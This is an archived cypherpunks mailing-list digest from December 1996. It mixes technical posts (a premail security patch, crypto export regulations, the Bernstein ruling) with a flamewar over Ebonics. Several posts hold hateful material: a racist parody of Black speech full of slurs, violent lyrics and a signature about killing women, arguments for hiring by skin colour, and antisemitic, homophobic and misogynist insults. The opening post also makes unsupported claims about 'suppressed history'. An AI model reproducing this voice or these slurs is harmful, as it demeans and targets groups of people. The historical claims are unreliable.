Bullshit yourself.  I was born and raised (mostly) in Ohio too.  You
didn't say what part of Tennessee, and there's a helluva difference
between Memphis, Nashville, and Chattanooga.  Just like you hear an
*enormous* difference in dialect between Akron and (for example)
Parkersburg, WVa, a mere 150 miles away.

You talk about "standard" English in the U.S., as though the U.S. spoke
*true* English.  More bullshit.  Be that as it may, the principal agents
of the early United States (Presidents, etc.) were Virginians, hence
Southerners. Sure, the barbarian hordes followed from Europe and settled
into Northern manufacturing and so on, and from them you establish that
that represents "standard" English?

You would know, if you had read some of the suppressed history of the
U.S., that barbarians who "speak Northern" have propagated tremendous
amounts of disinformation, including setting up speaking exhibits of
U.S. Presidents, where even the Southern Presidents "speak Northern or
Midwestern", i.e. a ficticious history.

If you read my complete post, you would note that I made a distinction
between "twang" (i.e., slurring words) and "accent" (something that
sounds "different" but is nonetheless clear), a distinction that you
have not grasped.

Next thing you'll say (probably) is that since the White Man killed off
the Indians, then the Indians must have been the True Savages.  Just
like it says in the Declaration Of Independence (yeah, it says that).
Now don't tell me that Thomas Jefferson was wrong, but you are right.
Read more, talk less.

[snip remainder]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <lucifer@dhp.com>
Date: Sat, 21 Dec 1996 20:50:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Security hole in premail
Message-ID: <199612220408.XAA03397@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Dec 1996, Mixmaster wrote:

> *** premail.orig	Fri Dec 20 18:46:01 1996
> --- premail	Fri Dec 20 18:55:54 1996
> ***************
> *** 3574,3579 ****
> --- 3574,3582 ----
>       }
>       for ($triesleft = 2; !$done && $triesleft; $triesleft--) {
>   	$pass = &getpass ($x);
> + 	if(!-O $ps) {
> + 		&error ("Secrets file exists and is owned by another user\n");
> + 	}
>   	$status = &decrypt_secrets ($ps_pgp, $ps, $pass);
>   	if (!-s $ps) { unlink $ps; }
>   	$done = (!$status && -e $ps);

That patch doesn't work.  It will always return an error.  I have tested the
following patch and it does work as intended:

*** premail.orig	Wed Oct 30 22:25:10 1996
--- premail	Sat Dec 21 15:45:41 1996
***************
*** 3631,3636 ****
--- 3631,3639 ----
      $invoc .= ' > '.$ps;
      $invoc .= ' 2> '.$errfile;
      &pdv ("Invoking PGP as $invoc\n");
+     if(-e $ps) {
+ 	&error ("Premail secrets file already exists\n");
+     }
      $status = &open_pgp ($invoc, $pass, '');
      $err = &read_and_delete ($errfile);
      &pdv ($err);

Sorry about the previous mistake.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: j@gangsta.com
Date: Sat, 21 Dec 1996 20:30:41 -0800 (PST)
Subject: No Subject
Message-ID: <9612220424.AA12742@monoceros.capital.edu>
MIME-Version: 1.0
Content-Type: text/plain


Punks,

        Nawh nigga, yous don't want dem udder foo's to be able to read jo
mail!  What da hail?!  Don'chew see it now?  Dis's anutha foam of
kryptografee!

        Da reason we be doin' dis shit is dat so dem basta'ds out dere
who be wantin' in on ours konversayshun can't be gettin' in.

        See?!  Now what foo' ass cracka muthafucka can be readin' dis
shit at a decent clip?  Shit!  Can't none of 'em!  De only problem is dat
it be takin' too long to put in dees apo-straphees.  If we gots rids ofs
dems, dens we'ds haves a much easia' time of doin' dis shit.

        Why don't one you cleva' boyz come up wit some kinda editor dat
crossreferences (oops, too many syllables) wit dat phat ass ebonics
dikshunary at EBONIC.ORG?  Den jus' give da dikshunary only to dose
people who you be wantin' to read jo shit.

        Yeomsayn'?  Hilary Clinton can't be readin' dis shit!  Can't
nobody else ova dere in D.C.  Us niggas here in Compton been down wit dis
phat ass kryptografee fo' a long ass time.  How do you tink dat us
gangstas is all still around?  We be talkin' shit ev'y night on da co'na,
but can't none da fuzz be translatin' so we's frees tos dos whateva' we's
wantin's tos dos.

   Yo, jus' lemme quote my phat ass nigga dogg Method Man befo' I go:

        "I'm slammin' niggas like Shaqueel, dis shit is real,
         When it's time to eat a meal, I rob and steal,
         Cuz mom ain't givin' me shit,
         So for da bread an' butta I leave niggas in da gutta,
         Wherde 'the mutha, I'm dangerous,
         Crazia' den a bag o' fuckin' angel dust,
         When I bus' my gat, muthafuckas take dirt naps,
         I'm all dat, wit a dime sack and a payback!"

   Dag!  Dat shit's phat, dogg.





**************************************************************************
# Gangsta J              # "Dead bodies pile up, an' it's plain to see,  #
# j@hardcore.gangsta.com #  it's because o' me.  I'm the girl killa, the #
# Brownsville ghetto     #  throat slitta, the cunt rippa" - J           #
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omega@bigeasy.com>
Date: Sat, 21 Dec 1996 20:31:15 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Executing Encrypted Code
In-Reply-To: <v02140b08aee0befb6cdb@[192.0.2.1]>
Message-ID: <Pine.LNX.3.95.961221232800.1265B-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Dec 1996, Peter Hendrickson wrote:

> (Of course, it is not out of the question that piracy boosts sales by
> advertising the product.  We haven't seen a good experiment for
> determining this.)

There's this little game called "Doom" that was released for free a few
years back.  pay your $$$ and you got to continue the game.  A couple hot
shot programmers in Texas apparently made quite a bit of money off of this.
Of course, the game was top-notch for its time


> Your characterization is accurate.  Ignoring the particulars of this
> scheme, it would certainly be neat if people could sell software
> without it being pirated.

They can.  Models such as the one above and free software provide one
alternative.  Companies make their money on a value added basis and from
corporations willing to pay proper license fees.  

Placing the kind of limitations you are envisioning upon hardware would be
ultimately harmful to the growth of an industry which has always relied on
innovation from "amateurs" on the outside of commercial circles.  
Furthermore, quality free applications and shareware applications
represent a challenge to commercial firms to produce better software that
customers are willing to pay for.  

me
_______________________________________________________________
 Omegaman <mailto:omega@bigeasy.com> 
  PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63 
 Send e-mail with "get key" in the "Subject:" 
 field to get a copy of my public key
_______________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omega@bigeasy.com>
Date: Sat, 21 Dec 1996 20:57:39 -0800 (PST)
To: Mark Rosen <mrosen@peganet.com>
Subject: Re: Ebonics
In-Reply-To: <199612212122.QAA11642@mercury.peganet.com>
Message-ID: <Pine.LNX.3.95.961221235414.1265C-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Dec 1996, Mark Rosen wrote:

> 	No. Speaking in Ebonics is the same as speaking with an accent. You can't
> control their expression; you learned to speak with a Southern accent as a
> child, while other people learned to speak with an Ebonic accent (?). By
> condoning speaking in a Southern accent, you condone speaking in Ebonics.

Whatever rational basis your arguments may have had were eradicated by the
ludicrous logical conclusion drawn above. 

> 	I can't understand thick Southern accents. No matter how smart you are,
> I'm not going to hire you because I can't understand you. How do you feel?

Oh so sad.  Let me make this clear, an accent is far different from
grammatically incorrect speech.  I can speak with grammatic perfection and a
drawl so heavy it'll make your eyeballs hurt.

(Of course, being from New Orleans, my normal accent is more like brooklyn
than Nashville -- four years in Mississippi changed all that)

> 	Replace the word Ebonics with "Southern accent" and "black English" with
> "Southern twang" and you'll see how hypocritical you are. Also, why do you
> make an exception for foriegn accents? They're just as difficult to
> understand.

And can still be spoken with proper grammar.   I make an exception for
foreign accents because we are dealing a completely separate language.
Speakers of ebonics are certainly not bilingual in this sense (and neither
am I).  I don't see hypocrisy at all.  I do see an apologist, pampering,
paternal point of view, however.  And we southern folk jes' don't abide that
sorta thang.

> 	Language is completely different from intellect. You can't control whether
> you were taught, Ebonics, a Southern accent, or "normal" English.

I wasn't "taught" a Southern accent.  I absorbed it in daily conversation.
I certainly wasn't taught a Southern dialect. I was taught the English
language.

I'll say it again...the notion that Ebonics exists as a separate language
-- not derived as slang from standard English -- is absurd.

me
_______________________________________________________________
 Omegaman <mailto:omega@bigeasy.com> 
  PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63 
 Send e-mail with "get key" in the "Subject:" 
 field to get a copy of my public key
_______________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 22:02:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <199612212015.PAA09322@mercury.peganet.com>
Message-ID: <qgoBZD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Mark Rosen" <mrosen@peganet.com> writes:
> someone if
> > they can't even understand what that person is saying.  Besides, I would
> > suspect that a reasonably intelligent person would know how to speak
> correct
> > English or at least make an attempt to do so.
> 	Especially in the computer field, language is irrelevant; as long as
> someone can "speak" C++ or HTML, they're fine.

You are clearly not in the computer field. Someone who can't document
his or her program, or can't explain something to a colleague, can't do
the job. Communication may be irrelevant to an assembly line workers,
but it sure matters for computer people.

> > Crypto will allow people to actively discriminate against whomever they
> wish.
> > It will also allow those who would be discriminated against to protect
> > information about themselves to prevent discrimination.  I don't support
> > discrimination based on race, but language is a completely different
> matter.
> 	Spoken language, which is what you're discriminating against is vastly
> different from typed language. Everyone types pretty much the same way but
> everyone speaks differently. People who speak in Ebonics or with a Southern
> twang often know the rules of grammar, as expressed in writing, but they do
> not speak "correctly" because they are not accustomed to doing so.

Once again I observe that "cypher punks" and "libertarians" are fucking
statists.

Yes, Timmy May is a racist asshole, but no, the fucking state should not
stop him from discriminating in any way he wants to.

If Timmy doesn't want to hire a good engineer because he doesn't like his
accent, his looks, his smells, his sexual preferences, it's Timmy's right.
Let Timmy punish himself by hiring the second best candidate and paying more.

The free market works. Don't fuck with it.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 22:02:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: The Ebonic Plague
In-Reply-To: <01BBEF4B.F9E5E740@king1-05.cnw.com>
Message-ID: <RPoBZD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


blanc <blancw@cnw.com> writes:

> And which are the scum who would be purged?

The asshole "cypher punks" who don't put carriage returns in their e-mail,
whether signed 'blanc' or sent via the anonymous remailers?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 22:00:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <v03007800aee2364954fd@[207.167.93.63]>
Message-ID: <iVoBZD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
>
> (Where is "Logos" these days?)

Jerking off at www.playgirl.com, like a true "cypher punk".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 22:02:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Ebonic Plague
In-Reply-To: <19961222014014.13259.qmail@suburbia.net>
Message-ID: <X1oBZD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


proff@suburbia.net writes:
> > >Just how would this take shape in "real life" - what would constitute this
> > >reign of terror; how do you envision such an event in action?
> > >
> > >And which are the scum who would be purged?
> >
> > The answer is implicit in many of my hundreds of posts.
> >
> > As to the scum who need purging: welfare recipients, both personal and
> > corporate, government employees at all levels, and so on.
> >
> > --Tim May
>
> Strange how you move closer to the mentality of Vulis every day.

If Timmy hadn't started attacking me, like an asshole that he is, I'd have
had no problem with him and his views.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 22:00:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "the world is half women, even though they're not on the c-punks
In-Reply-To: <v03007800aee201b0d0e5@[207.167.93.63]>
Message-ID: <T3oBZD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:

> At 10:20 AM -0800 12/21/96, Dale Thorn wrote:
>
> >Ya' know, guys, the world is half women, even though they're not on
> >the c-punks list.  Get in touch with them.  They're fun people.
>
> Ah, it's been a while since we had the "why aren't more women on the list?"
> discussion.
>
> Frankly, women are of course welcome. If the list interests them, they are
> welcome to subscribe. As it has always been.
>
> That so few women are subscribers, or remain subscribers, or attend
> Cypherpunks physical meetings....well, that's a larger issue involving
> familiar issues:

The women I've seen at DC Punks meetings were invariably ugly Lesbians
(except one).

> - why are libertarian events so dominated by males? (in attendance, for
> example)

Because women are too smart to buy into hypocritical "libertarian" bullshit.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 22:00:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <Pine.LNX.3.95.961221155712.1265A-100000@jolietjake.com>
Message-ID: <m8oBZD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Omegaman <omega@bigeasy.com> writes:

> On Sat, 21 Dec 1996, Mark Rosen wrote:
>
> > 	* You are making glaring generalizations regarding all members of an
> > ethnic body; you don't seem to realize that intellect is based not on color
> > or how you talk but on your brain (which has the same color and other basic
> > properties in all humans, I believe)
>
> That's not what was said.  He said he would not hire on the basis of a
> person's inability to speak the English language.  That has nothing
> whatsoever to do with color.    If you can't communicate with your
> co-workers, how can you expect to get any work done?

In this case you're right - ability to communicate is a bona fide occupational
qualification. But he should be able to refuse to hire them if he doesn't like
the color of their skin. Fuck the gubmint interference.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 22:00:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: The Ebonic Plague
In-Reply-To: <v03007800aee22a52f865@[207.167.93.63]>
Message-ID: <FDPBZD8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> As to the scum who need purging: welfare recipients, both personal and
> corporate, government employees at all levels, and so on.

Even Timmy May (fart) makes sense sometimes.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 22:00:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <199612220126.SAA20072@web.azstarnet.com>
Message-ID: <TFPBZD9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


drose@AZStarNet.com writes:
> I can certainly express my personal freedom by passing wind at home (subject
> only to the possibly vociferous objections of my family).
>
> Were I to fart in church or in a board meeting, that would be a horse of a
> different color, nicht wahr?

So what are they gonna do, arrest you for farting?

I fart in Timmy May's general direction.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Sat, 21 Dec 1996 21:44:29 -0800 (PST)
To: Nelson Minar <nelson@media.mit.edu>
Subject: Re: Running code on a machine you don't trust (was Re: Executing Encrypted Code)
In-Reply-To: <cpag20z1kp8.fsf@hattrick.media.mit.edu>
Message-ID: <9612220544.AA15781@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


There are several algorithms I've seen that allow for blind execution
of arbitrary code and verification of correctness given the usual
cryptographic assumptions. Their problem is that they are absurdly
inefficient. But their existence suggests the possibility of efficient
algorithms (or at least a good paper deriving lower bounds on the
complexity of such algorithms).

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 22 Dec 1996 04:13:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: EBONIC.ORG
In-Reply-To: <Pine.BSF.3.95.961221225200.21034A-100000@atlas.comet.net>
Message-ID: <k8sBZD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jamie@comet.net (jamie dyer) writes:

>  FITTYSEN = Four bits. Half a dollar.
>
>  FLO = The thing a rug is laid upon.
>
>  BODE = Can be a two-by-four or any other measure of lumber.
>
>  DUNDUN = A statement of completion. "I dundun it."
>
>  SAYLAY = A 24 hour store. Most neighborhoods have one.
>
>  BITCH = Female companion. Wife. Mother. Whore. You. Me. Best Friend.

This is the most crypto-relevant article on this mailing list in MONTHS.
Navajo talk?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Sat, 21 Dec 1996 06:36:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: New Australian export regulations
Message-ID: <85117896422931@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


Australia's new export control regulations have just been posted to the net, 
you can get them from http://www.adfa.oz.au/DOD/al/iic/excontrl/excohome.htm 
(they're all Word 6.0 documents, I've been reading them with a binary file 
browser - blech).  What makes them interesting is that most of the text is 
word for word identical to the Canadian regulations (which is sensible, since 
the Canadian ones are clear and easy to follow, unlike the US "We'll let you 
know when you've broken the law" FUD regulations).  The only thing which is 
different is the section numbering, the mapping from Canadian to Australian 
section numbers appears to be:
 
  10xy.y.z -> xY00?.Y.Z 
 
where y -> Y == 1 -> A, 2 -> B, etc and z -> Z == A -> 1, 2 -> B, etc, so that 
Canadian 1151.1.c becomes Australian 5A002.a.3 (this doesn't work in all 
cases, if there's no .n suffix on the Australian number then the .n part from 
the Canadian number becomes part of the main Australian number, eg 1071.5 -> 
7A005.
 
The text may not be taken straight from the Canadian one because some of the 
spelling mistakes in the Canadian one aren't present in the Austrlian one, or 
maybe it was prepared from a later version which had been spelling checked.
 
For crypto software, you want cat_5.doc, equivalent to section 1150 of the 
Canadian regulations.
 
Anyway, here's the good bit, in sou.doc, "GENERAL TECHNOLOGY NOTE (PART 1 - 
MUNITIONS LIST)"
 
>3. Controls do not apply to "technology" "in the public domain", to "basic 
>   scientific research" or to the minimum necessary information for patent 
>   applications.
    
Again, this is identical to the Canadian regulations.  Since the Canadian 
government has already ruled that a whole variety of crypto software is 
exportable under this exception, it means that the same stuff (and equivalent 
software from Australia) should also be exportable, or at least that you've 
got a very good case for arguing with the Australian government if they decide 
it's not exportable.
 
Then in definits.doc we again have the Canadian text:
 
>"In the public domain" (GTN NTN GSN), as it applies herein, means 
>"technology" or "software" which has been made available without restrictions 
>upon its further dissemination (copyright restrictions do not remove 
>"technology" or "software" from being "in the public domain").
 
It's nice to have this stuff laid out at last, because it finally takes the 
Australian crypto controls out of a gray area and defines them so that stuff 
like SSLeay and my own cryptlib aren't restricted.
 
Incidentally, there's also the cute:
 
>1. The export of "technology" which is "required" for the "development", 
>   "production" or "use" of items controlled in the Munitions List is 
>   controlled according to the provisions in the Munitions List entries.  
>   This "technology" remains under control even when applicable to any 
>   uncontrolled item.
 
This covers virtually any software development tool, and any kind of computer 
hardware, as well as natural neural networks and personal digital extensions 
(of the kind designed for keyboard data entry).
 
I wonder if we'll see the regulations retroactively changed when someone in 
Canberra realizes what they've copied from the Canadian regs :-).
 
Peter.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Sun, 22 Dec 1996 04:19:48 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Slaughter
In-Reply-To: <aVL0yD28w165w@bwalk.dm.com>
Message-ID: <32BD3731.33D3@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn wrote:
> As I remember the quote, it ended something like "and they came for me,
> but there was nobody left to speak up".

Dale,
  Thanks, I love the quote but can't find it or it's source.  Perhaps I can put it
all together in bits and pieces.

>  We just don't believe (naively) that just
> because someone issues code that was designed 20 years ago, and which
> the NSA can undoubtedly crack in a heartbeat, that that code can
> necessarily protect us against all comers.

   I don't thinkI'm very naieve about cryptography.  I fully realize that the same
goons that will crack you over the head for what you've written, will also be
prone to cracking you over the head for 'not' being able to read what you
have written.
 
> There is a difference between principle and fact.  You have the
> principles exactly correct, but as to facts, you have to be eternally
> vigilant, i.e., don't get too comfortable with PGP et al.

   Thanks for the advice.  PGP serves me very well for most of my correspondences,
but I add a little 'je ne sais quoi' to it for things I consider to be of more
personal import.  It's probably something that experienced crytptographers would
laugh at, but just because I'm not a professional security-alarm designer doesn't
mean I'm going to leave my housekey under the front door mat.
-- 
Reply to:toto@sk.sympatico.ca
"There's only one two."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@primenet.com>
Date: Sat, 21 Dec 1996 22:26:33 -0800 (PST)
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Bernstein (export laws unconstitutional) decision update
In-Reply-To: <Pine.LNX.3.95.961221074912.234A-100000@batcave.intrex.net>
Message-ID: <199612220628.XAA01413@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <Pine.LNX.3.95.961221074912.234A-100000@batcave.intrex.net>, on 12/21/96 
   at 07:51 AM, The Deviant <deviant@pooh-corner.com> said:

::On Fri, 20 Dec 1996, Michael Tighe SUN IMP wrote:

::> John Gilmore writes:
::> 
::> >After further consultations with the attorneys, we are not sure
::> >whether the decision has nationwide impact or whether it is limited 
::> >to the Northern District of California (which includes SF and 
::> >Silicon Valley).
 
::Your Mileage May Vary -- check with your lawyer.

    <attila:>

        and where does the average hacker find a reliable attorney in 
    these matters?  more likely you will find the usual charlatan 
    mouthpiece who will give it a whirl, be body-traded out, and still 
    take your money.
    
        and that is just what is so special about pro bono attorneys: 
    they have their soul on the line; and, even better, when the 
    horsepower has the folks at Baker & Hostetler behind them (even if 
    their head office is in Cleveland --my mother remembered Hostetler 
    when he helped his father deliver milk door to door in East 
    Cleveland (in the 1910s!))

    </attila>

::> 
::> The decision itself says it only applies to Bernstein, and then only 
::> for source code.
::> 

::The fact that one judge says his ruling only applies to one person is
::irrelevant ; his decision can, and probably will, be used as precedent 
::in other cases, which is the good that it really serves in the first 
::place. More power to Mr. Bernstein and all, but in reality this case 
::has almost nothing to do with him in particular.  The real usefullness 
::of this case is so that other judges can see that at least one judge 
::believes that the law _can_ be wrong, even if only in specific cases.

    <attila>

        Absolutely! 

        Given the concept I propounded a few days ago that each Federal 
    District Judge is his own 'Judge Roy Bean, Law West of the Pecos," 
    he still has reference to the decision; he can either use it as the
    basis of the decision in his court, or he can ignore. If the case has        
    been to appeal and affirmed; and, Judge Roy is in the same appeals 
    circuit, an adverse decision is not likely to stand.

        What's the point?  PRECEDENCE!

        Bernstein (who hung on despite dealing with a mute point in his
    own case), the EFF, and all the <i> pro bono </i> attorneys who made
    the case successful are to be congratulated.  

        We, if we love our freedom, owe all of the players a rather large 
    debt of gratitude for blowing a hole in Fort Clinton.

        and, I will stand up and say "thank you!" any place I can.

    </attila>
  ==
    Tyranny Insurance by Colt Manufacturing Co.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMrzUVr04kQrCC2kFAQHPsQQAwl4UWKtrUYhwF4GoPZTWZdYozRpgzr0N
U20Mb4PmrgeeKzHfRV7CjJmbqsQX3AdM0ydn7KN8BcnKs5jhWqKQ+vPfjb/Vn56b
3woBhc6Lg0ERMpOPaBvRjpynsHzTjCarb24JEqP70UyEHvS2o7MBIZLbF2rsW9Xa
txBdQz9+vIk=
=09yf
-----END PGP SIGNATURE-----
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Sun, 22 Dec 1996 05:16:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Fwd: To unsbscribe, unscrivive, or ubsribibe]
Message-ID: <32BD4434.1EE5@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain

-- 
Reply to:toto@sk.sympatico.ca
"There's only one two."


To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: To unsbscribe, unscrivive, or ubsribibe
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Sun, 22 Dec 1996 06:18:30 -0800
Organization: TOTO Enterprises
References: <2BJaZD31w165w@bwalk.dm.com>

ABB Electrical Engineering  <abbee@ritsec1.com.eg> writes:
 
> Can anyone  tell me please how to unsbscribe and not to receive such mail.

  To unsbscibe, unscrivive, or ubsribibe, just send eMail to fuck@yourself.up.
He will be happy to send you an executable program that will ensure that you
will no longer get any mail from this conference.
  Glad I could be of assistance.
-- 
Reply to:toto@sk.sympatico.ca
"There's only one two."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@primenet.com>
Date: Sat, 21 Dec 1996 22:50:50 -0800 (PST)
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: Reflections on the Bernstein ruling
In-Reply-To: <3.0.32.19961220234518.006a1ef4@law.uoregon.edu>
Message-ID: <199612220653.XAA01816@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


        a good review by Greg Broiles of the reasons, expressions of 
    "faith and doubt," etc. on the part of Judge Patel, and further 
    confirmation of my statements on the wide open plains of judicial 
    discretion on the federal bench.  Judge Patel is also to be 
    commended for her courage of standing up to the pressure from the 
    DOJ and the White House; I doubt she is high on their popularity 
    chart... <g>

        I think my comment on firing a shot which has breached Fort 
    Clinton and the thanks we owe Bernstein and all the lawyers is 
    about the bottom line --we have hit the target, but we have not 
    killed the beast.  It will take many more decisions, on a case by 
    case basis, to fight the administration, and a few brave souls 
    could be looking at three hots and a cot before it is over.

        have no doubt:  Bubba has no intention of backing down. Free 
    speech, and private communication over open public lines, removes 
    the power of the government to intimidate the populace; and takes 
    away the media's slanted exclusivity.  

    Expect a wave of prosecutions as the DOJ goes for broke.

            --attila

  ==
    Tyranny Insurance by Colt Manufacturing Co.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: Encrypted with 2.6.3i. Requires 2.6 or later.

iQCVAwUBMrzaBr04kQrCC2kFAQG7ogQAuW2xTRiSY1CKixwzMr2O5TkT/P7OpNug
9Jb/mcQhc/b/JivaW6qWDQQiiVz1NZ0ueRWlAX3UJvJ70qv4uRmiOACCXYIkmgno
vtZMDOgmMayICJrrtsve2vCVRna28St8tev8UvAenIIHcwYZILT7RhcgRXsESIsa
gywlHvXYaAc=
=tg0J
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 22 Dec 1996 06:10:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dale defends free society from the NSApunks
In-Reply-To: <32BCE254.3D82@sk.sympatico.ca>
Message-ID: <PLacZD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Carl Johnson <toto@sk.sympatico.ca> writes:

> Dr.Dimitri Vulis KOTM wrote:
> > For those who don't know what kind of slimeball Rich Graves is:
> > Rich Graves is a paranoid Jewhater who likes to harrass Jews by
> > spamming inappropriate public forums with Holocaust flame bait.
>
> Dr. DM K,
>   Yes, but I'm sure that he has some bad qualities, too.

Is "Gravesian" gay?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Sun, 22 Dec 1996 11:11:33 -0800 (PST)
To: "Attila T. Hun" <gbroiles@netbox.com>
Subject: Re: Reflections on the Bernstein ruling
In-Reply-To: <3.0.32.19961220234518.006a1ef4@law.uoregon.edu>
Message-ID: <v03007805aee316ab6bae@[206.217.121.78]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:46 PM -0800 12/21/96, Attila T. Hun wrote:
>        have no doubt:  Bubba has no intention of backing down. Free
>    speech, and private communication over open public lines, removes
>    the power of the government to intimidate the populace; and takes
>    away the media's slanted exclusivity.
>

It takes away a power J. Edger Hoover used very effectively.  That is, the
power to control Washington power brokers by tapping their lines and
